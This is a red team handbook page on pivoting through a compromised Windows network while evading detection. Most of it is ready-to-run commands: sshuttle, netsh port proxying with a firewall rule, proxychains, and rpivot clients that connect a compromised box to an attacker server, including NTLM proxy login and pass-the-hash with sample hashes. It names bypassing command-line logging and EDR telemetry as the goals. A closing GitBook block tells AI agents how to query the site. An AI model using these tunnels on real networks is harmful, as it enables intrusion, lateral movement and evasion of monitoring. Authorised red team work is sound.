> For the complete documentation index, see [llms.txt](https://kwcsec.gitbook.io/the-red-team-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/minimization/pivoting.md). # Pivoting This article will go through ways to use a windows machine as a proxy and ways to pivot through the network. But why would we do a thing like this in the first place? Well, the pros are: 1. Bypass command line logging 2. No execution on the host, EDRs don't have telemetry over this 3. We touch less hosts But the cons are: 1. You lose being in context of the windows user due to the fact that you don't have the privilege of windows SSO.(Need credentials) Let's look at some ways technologies we can use to pivot.(C2 Frameworks like metasploit and cobalt strike have multiple guides on how to do so.) Once you are in the network, you can use tools like Impacket and RPCclinet to gain info and move laterally throughout the network. ## SSHuttle This can create a VPN connection with only VPN access on the host. Note that the only requirement this needs is for python to be installed. The below will forward all traffic. ``` sshuttle -r @ 0.0.0.0/0 ``` ## Firewalls Windows Firewall can to proxy connections similarly to iptables redirectors. ``` netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCALPORT connectaddress=REMOTE_ADDRESS connectport=REMOTE_PORT protocol=tcp netsh advfirewall firewall add rule name=”Evill” protocol=TCP dir=in localip=LOCAL_ADDRESS localport=LOCAL_PORT action=allow ``` ## Proxychains for Windows To pivot a windows operator machine into the target network, this can be used in conjunction with a socks proxy. ``` proxychains_win32_x64.exe –f ``` ## Rpivot This tunnels traffic into internal networks via socks4proxy in python with only the standard library. This supports NTLM proxy authentication with username or NTLM hashes: Server (Attacker box) ``` python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0 ``` Client (Compromised box) ``` python client.py --server-ip --server-port 9443 ``` Through corporate proxy ``` python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e ``` Passing the hash ``` python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ --ntlm-proxy-port 8080 --domain CORP --username jdoe \ --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE ``` ### --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/minimization/pivoting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.